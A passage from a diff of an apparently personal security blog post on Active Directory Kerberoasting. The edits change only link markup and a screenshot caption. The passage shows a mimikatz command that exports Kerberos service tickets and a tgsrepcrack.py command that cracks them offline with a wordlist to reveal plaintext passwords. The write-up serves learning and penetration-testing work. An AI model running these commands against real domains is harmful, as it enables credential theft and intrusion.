JDSecDef/JDSecDef.github.io/_posts/2022-07-09-AD Kerberoasting.md

 mimikatz # kerberos::list /export
 ~~~

 <p>The kirbi file can now be taken offline and cracked to reveal the clear text password.
-The <https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py> Python script and a wordlist can be used to crack the clear text password.
+The <a href="https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py" title="tgsrepcrack.py">tgsrepcrack Python script</a> and a wordlist can be used to crack the clear text password.
 Below is the required syntax:</p>

 ~~~bash
 python3 tgsrepcrack.py dictionaryfile .kirbifile
 ~~~

+<p>The following screenshot shows a service ticket being successfully cracked to reveal the clear text password</p>

 ![crackedspnexample](/assets/crackspn.png)